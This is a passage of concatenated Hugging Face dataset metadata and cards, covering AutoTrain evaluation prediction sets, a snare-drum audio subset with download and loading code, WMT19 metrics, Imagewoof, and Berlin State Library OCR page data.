] | 2022-07-25T22:18:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa-ext", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:20:32+00:00 |
8082af326609adb4497e5770cb5c05824349d0ef | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845581 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T22:20:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:26:00+00:00 |
dc842ba21530077e2385514585f385e671eb9f32 |
# Snares
A subset of FSD50K containing only snare drum samples.
```
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.csv
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.zip
unzip snares.zip
```
If you unpack the archive as described above, the paths in `snares.csv` will point to the extracted audio files. Loading the CSV with pandas:
```python
import pandas as pd

# Each row describes one snare sample, including the path to its extracted audio file.
df = pd.read_csv('snares.csv')
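
# Usage sketch: load one sample's audio with librosa.
# NOTE: the column name "path" is an assumption -- inspect df.columns for the real field.
import librosa

audio, sr = librosa.load(df.loc[0, "path"], sr=None)  # sr=None keeps the native sample rate
print(audio.shape, sr)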
``` | nateraw/snares | [
"language:en",
"license:other",
"region:us"
] | 2022-07-26T00:38:47+00:00 | {"language": "en", "license": "other"} | 2022-07-26T00:48:47+00:00 |
e35dab202174c0845fc172f35bfcada0a31bafa4 | betterme/goldendata | [
"license:mit",
"region:us"
] | 2022-07-26T00:58:58+00:00 | {"license": "mit"} | 2022-07-26T01:05:07+00:00 |
|
cdeb4ea38252c283f5717b007ae8f8d5c5d3c73f | ```yaml
annotations_creators:
- no-annotation
language:
- en
- fa
language_creators:
- crowdsourced
license:
- other
multilinguality:
- multilingual
pretty_name: en-fa-translation
size_categories:
- 1M<n<10M
source_datasets:
- original
tags: []
task_categories:
- translation
task_ids: []
``` | Kamrani/en-fa-translation | [
"region:us"
] | 2022-07-26T02:10:34+00:00 | {} | 2022-07-30T03:13:38+00:00 |
e16e967d01e8a5e796eef1ec263c83b2c3f3fac3 |
The prompts used in the Simulacra Discord bot, as [released](https://github.com/JD-P/simulacra-aesthetic-captions) in the simulacra-aesthetic-captions repository.
Thanks to deltawave on Discord for supplying this dataset! | BirdL/SimulaPrompts | [
"license:cc0-1.0",
"region:us"
] | 2022-07-26T03:52:06+00:00 | {"license": "cc0-1.0"} | 2022-12-19T22:06:33+00:00 |
8078e27c5ff4c52d5b85572ed45d36c712a3c423 |
# Dataset Card for WMT19 Metrics Task
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [WMT19 Metrics Shared Task](https://www.statmt.org/wmt19/metrics-task.html)
- **Repository:** [MT Metrics Eval Github Repository](https://github.com/google-research/mt-metrics-eval)
- **Paper:** [Paper](https://aclanthology.org/W19-5302/)
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
[More Information Needed]
### Languages
The dataset comprises the following language pairs (a loading sketch follows the list):
- de-cs
- de-en
- de-fr
- en-cs
- en-de
- en-fi
- en-gu
- en-kk
- en-lt
- en-ru
- en-zh
- fi-en
- fr-de
- gu-en
- kk-en
- lt-en
- ru-en
- zh-en
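As a minimal sketch, a single language pair could be loaded as its own configuration; the configuration naming below is an assumption and should be verified against the dataset script.
```python
from datasets import load_dataset

# The per-language-pair config name ("de-en") is an assumption; verify the
# available configurations before use.
wmt19_de_en = load_dataset("muibk/wmt19_metrics_task", "de-en")
```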
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
### Contributions
Thanks to [@mustaszewski](https://github.com/mustaszewski) for adding this dataset.
| muibk/wmt19_metrics_task | [
"task_categories:translation",
"annotations_creators:expert-generated",
"language_creators:found",
"language_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:translation",
"size_categories:100K<n<1M",
"license:unknown",
"region:us"
] | 2022-07-26T06:21:28+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["found", "machine-generated", "expert-generated"], "language": ["de-cs", "de-en", "de-fr", "en-cs", "en-de", "en-fi", "en-gu", "en-kk", "en-lt", "en-ru", "en-zh", "fi-en", "fr-de", "gu-en", "kk-en", "lt-en", "ru-en", "zh-en"], "license": ["unknown"], "multilinguality": ["translation"], "size_categories": ["100K<n<1M"], "source_datasets": [], "task_categories": ["translation"], "task_ids": [], "pretty_name": "WMT19 Metrics Shared Task"} | 2022-07-26T09:06:23+00:00 |
38e21f35965ee9f983839b416930aa3429ac60a5 | Achen/large-test | [
"license:bsd-2-clause",
"region:us"
] | 2022-07-26T07:09:21+00:00 | {"license": "bsd-2-clause"} | 2022-07-27T01:39:08+00:00 |
|
53514cd2b8c3bccdde0a61348e5ef76d3a6748a6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/electra-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855583 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/electra-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:48+00:00 |
696f9a3028e982a43e69283dab450a4be0e0f72e | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinybert-6l-768d-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855584 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:41+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinybert-6l-768d-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:20+00:00 |
55b89a23287e3762d16ad2ed49412c4dbb00d49a | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-base-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855585 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-base-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:49+00:00 |
e5c897042bb83fe95d7f687c51d48ed06f2b55a2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-medium-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855586 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:51+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-medium-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:27+00:00 |
425e4ccec0605e663e762c5a088dcc5c6884329b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855587 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:57+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:21:10+00:00 |
052d2a9b78958a0f77a54fb5689aec9bc6827eb4 | jordane95/msmarco-passage-with-query | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T07:25:24+00:00 | {"license": "afl-3.0"} | 2023-03-01T09:13:35+00:00 |
|
c68710dd4a69eca02807018e4e93a4211b68c86a | jordane95/msmarco-passage-corpus-with-query | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T07:30:52+00:00 | {"license": "afl-3.0"} | 2022-07-27T01:02:45+00:00 |
|
2da7b5117419f7bd56e09b02442fed0c5c2e934a | mingz/demo | [
"region:us"
] | 2022-07-26T09:55:03+00:00 | {} | 2022-07-26T09:55:21+00:00 |
|
b9a7ed6dcfa2236fcfd4cc28fd129f5642ddf89d | asparius/demirtas-movie | [
"license:mit",
"region:us"
] | 2022-07-26T10:39:08+00:00 | {"license": "mit"} | 2022-07-26T10:56:21+00:00 |
|
dc2f783401fca4dc3c2fd7dd2b3b54892ca65332 | frogvre/lgo1 | [
"license:unknown",
"region:us"
] | 2022-07-26T13:20:16+00:00 | {"license": "unknown"} | 2022-07-26T13:20:16+00:00 |
|
0d81b9869910b53d9fac2bddf8d3e2eb2afe8a50 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-base-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875589 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:50+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-base-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:30+00:00 |
0b848ff3c9d5c4d515e9fea94415453bc756d489 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-large-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875590 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-large-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:57+00:00 |
8c73891571e4da2fe888c7e9ed21167402492e59 | Achen/voc-test | [
"license:bsd",
"region:us"
] | 2022-07-26T14:12:11+00:00 | {"license": "bsd"} | 2022-07-27T02:24:17+00:00 |
|
8dc1bdb0cbe71fea85bb3a4f14c2c1b57c61d88f |
# Dataset Card for Imagewoof
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://github.com/fastai/imagenette#imagewoof
- **Repository:** https://github.com/fastai/imagenette
- **Leaderboard:** https://paperswithcode.com/sota/image-classification-on-imagewoof
### Dataset Summary
A smaller subset of 10 classes from [Imagenet](https://huggingface.co/datasets/imagenet-1k#dataset-summary) that aren't so easy to classify, since they're all dog breeds.
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward); this repository exists only to share his work on this platform. The repository owner claims no credit of any kind for the creation, curation, or packaging of the dataset.
### Supported Tasks and Leaderboards
- `image-classification`: The dataset can be used to train a model for Image Classification.
### Languages
The class labels in the dataset are in English.
## Dataset Structure
### Data Instances
A data point comprises an image and its classification label.
```
{
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=320x320 at 0x19FA12186D8>,
'label': 'Beagle',
}
```
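A minimal loading sketch with the `datasets` library is shown below. The config name `full_size` is an assumption; the repository also documents resized variants, so check it for the available configs:

```python
from datasets import load_dataset

# "full_size" is assumed; smaller configs such as "320px" or "160px" may also be available
dataset = load_dataset("frgfm/imagewoof", "full_size", split="train")
example = dataset[0]
print(example["image"].size, example["label"])
```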
### Data Fields
- `image`: A `PIL.Image.Image` object containing the image.
- `label`: the expected class label of the image.
### Data Splits
| |train|validation|
|---------|----:|---------:|
|imagewoof| 9025| 3929|
## Dataset Creation
### Curation Rationale
cf. https://huggingface.co/datasets/imagenet-1k#curation-rationale
### Source Data
#### Initial Data Collection and Normalization
Imagewoof is a subset of [ImageNet](https://huggingface.co/datasets/imagenet-1k). Information about data collection of the source data can be found [here](https://huggingface.co/datasets/imagenet-1k#initial-data-collection-and-normalization).
### Annotations
#### Annotation process
cf. https://huggingface.co/datasets/imagenet-1k#annotation-process
#### Who are the annotators?
cf. https://huggingface.co/datasets/imagenet-1k#who-are-the-annotators
### Personal and Sensitive Information
cf. https://huggingface.co/datasets/imagenet-1k#personal-and-sensitive-information
## Considerations for Using the Data
### Social Impact of Dataset
cf. https://huggingface.co/datasets/imagenet-1k#social-impact-of-dataset
### Discussion of Biases
cf. https://huggingface.co/datasets/imagenet-1k#discussion-of-biases
### Other Known Limitations
cf. https://huggingface.co/datasets/imagenet-1k#other-known-limitations
## Additional Information
### Dataset Curators
cf. https://huggingface.co/datasets/imagenet-1k#dataset-curators
and Jeremy Howard
### Licensing Information
[Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0).
### Citation Information
```
@software{Howard_Imagewoof_2019,
title={Imagewoof: a subset of 10 classes from Imagenet that aren't so easy to classify},
author={Jeremy Howard},
year={2019},
month={March},
publisher = {GitHub},
url = {https://github.com/fastai/imagenette#imagewoof}
}
```
### Contributions
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward) and published on [GitHub](https://github.com/fastai/imagenette). It was later integrated into Hugging Face Datasets by [@frgfm](https://huggingface.co/frgfm).
| frgfm/imagewoof | [
"task_categories:image-classification",
"annotations_creators:crowdsourced",
"language_creators:crowdsourced",
"size_categories:1K<n<10K",
"source_datasets:extended",
"language:en",
"license:apache-2.0",
"region:us"
] | 2022-07-26T14:21:56+00:00 | {"annotations_creators": ["crowdsourced"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["apache-2.0"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": ["extended"], "task_categories": ["image-classification"], "task_ids": [], "paperswithcode_id": "imagewoof", "pretty_name": "Imagewoof"} | 2022-12-11T22:26:18+00:00 |
3f80d82f04e37d40b5972c5fcc5bb0e7c7830e76 | robertmyers/convo_base | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T14:56:10+00:00 | {"license": "afl-3.0"} | 2022-07-26T14:56:10+00:00 |
|
a0d9ca0b1c481c4e8b2100bb6eb0457559e3f508 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Graphcore/roberta-base-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@Narayana](https://huggingface.co/Narayana) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-47db8743-11885591 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T15:36:22+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Graphcore/roberta-base-squad", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T15:38:56+00:00 |
7c7d48c7cf5047d41d499131f6e3e5d57fc8abe5 | naem1023/final_aug_2000 | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T16:51:47+00:00 | {"license": "afl-3.0"} | 2022-07-26T16:52:12+00:00 |
|
2eb12757b146d9c1fbfda4e8f8d4a10c520de326 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-12-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895592 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:58:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-12-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:52:05+00:00 |
9acbc0b433d326333ebec9838d2cfd3dd96e4a6c | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: philschmid/distilbart-cnn-12-6-samsum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895594 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:59:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "philschmid/distilbart-cnn-12-6-samsum", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:47:15+00:00 |
09f0a5fb1b4b7bb1b18dac3c50ceeeaae00969fe | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-6-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895593 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T17:01:21+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-6-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:34:27+00:00 |
a890935d5bd754ddc5b85f56b6f34f6d2bb4abba |
# Dataset Card for Berlin State Library OCR data
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.
> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.
For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).
### Supported Tasks and Leaderboards
- `language-modeling`: this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.
### Languages
The collection includes material across a large number of languages. The languages of the OCR text have been detected using [langid.py: An Off-the-shelf Language Identification Tool](https://aclanthology.org/P12-3005) (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. **Note:** not all examples may have been successfully matched to the language prediction table from the original data.
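For reference, here is a minimal sketch of how such predictions can be reproduced with `langid.py`. The normalised-probability setup is an assumption about how the confidence scores in this dataset were obtained:

```python
import langid
from langid.langid import LanguageIdentifier, model

# plain classify() returns an unnormalised log-probability score
print(langid.classify("Dit is een voorbeeldzin."))

# normalised probabilities in [0, 1], comparable to the confidence field in this dataset
identifier = LanguageIdentifier.from_modelstring(model, norm_probs=True)
print(identifier.classify("Dit is een voorbeeldzin."))
```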
The frequency of the top ten languages in the dataset is shown below:
| | frequency |
|----|------------------|
| de | 3.20963e+06 |
| nl | 491322 |
| en | 473496 |
| fr | 216210 |
| es | 68869 |
| lb | 33625 |
| la | 27397 |
| pl | 17458 |
| it | 16012 |
| zh | 11971 |
[More Information Needed]
## Dataset Structure
### Data Instances
Each example represents a single page of OCR'd text.
A single example of the dataset is as follows:
```python
{'aut': 'Doré, Henri',
'date': '1912',
'file name': '00000218.xml',
'language': 'fr',
'language_confidence': 1.0,
'place': 'Chang-hai',
'ppn': '646426230',
'publisher': 'Imprimerie de la Mission Catholique',
'text': "— 338 — Cela fait, on enterre la statuette qu’on vient d’outrager, atten dant la réalisation sur la personne elle-même. C’est l’outrage en effigie. Un deuxième moyen, c’est de représenter l’Esprit Vengeur sous la figure d’un fier-à-bras, armé d’un sabre, ou d’une pique, et de lui confier tout le soin de sa vengeance. On multiplie les incantations et les offrandes en son honneur, pour le porter au paroxysme de la fureur, et inspirer à l’Esprit malin l’idée de l’exécution de ses désirs : en un mot, on fait tout pour faire passer en son cœur la rage de vengeance qui consume le sien propre. C’est une invention diabolique imaginée pour assouvir sa haine sur l’ennemi qu’on a en horreur. Ailleurs, ce n’est qu’une figurine en bois ou en papier, qui est lancée contre l’ennemi; elle se dissimule, ou prend des formes fantastiques pour acomplir son œuvre de vengeance. Qu’on se rappelle la panique qui régna dans la ville de Nan- king ifâ ffl, et ailleurs, l’année où de méchantes gens répandirent le bruit que des hommes de papier volaient en l’air et coupaient les tresses de cheveux des Chinois. Ce fut une véritable terreur, tous étaient affolés, et il y eut à cette occasion de vrais actes de sauvagerie. Voir historiettes sur les envoûtements : Wieger Folk-Lore, N os 50, 128, 157, 158, 159. Corollaire. Les Tao-niu jift fx ou femmes “ Tao-clie'’. A cette super stition peut se rapporter la pratique des magiciennes du Kiang- sou ■n: m, dans les environs de Chang-hai ± m, par exemple. Ces femmes portent constamment avec- elles une statue réputée merveilleuse : elle n’a que quatre ou cinq pouces de hauteur ordinairement. A force de prières, d’incantations, elles finissent par la rendre illuminée, vivante et parlante, ou plutôt piaillarde, car elle ne répond que par des petits cris aigus et répétés aux demandes qu’on lui adressé; elle paraît comme animée, sautille,",
'title': 'Les pratiques superstitieuses',
'wc': [1.0,
0.7266666889,
1.0,
0.9950000048,
0.7059999704,
0.5799999833,
0.7142857313,
0.7250000238,
0.9855555296,
0.6880000234,
0.7099999785,
0.7054545283,
1.0,
0.8125,
0.7950000167,
0.5681818128,
0.5500000119,
0.7900000215,
0.7662500143,
0.8830000162,
0.9359999895,
0.7411110997,
0.7950000167,
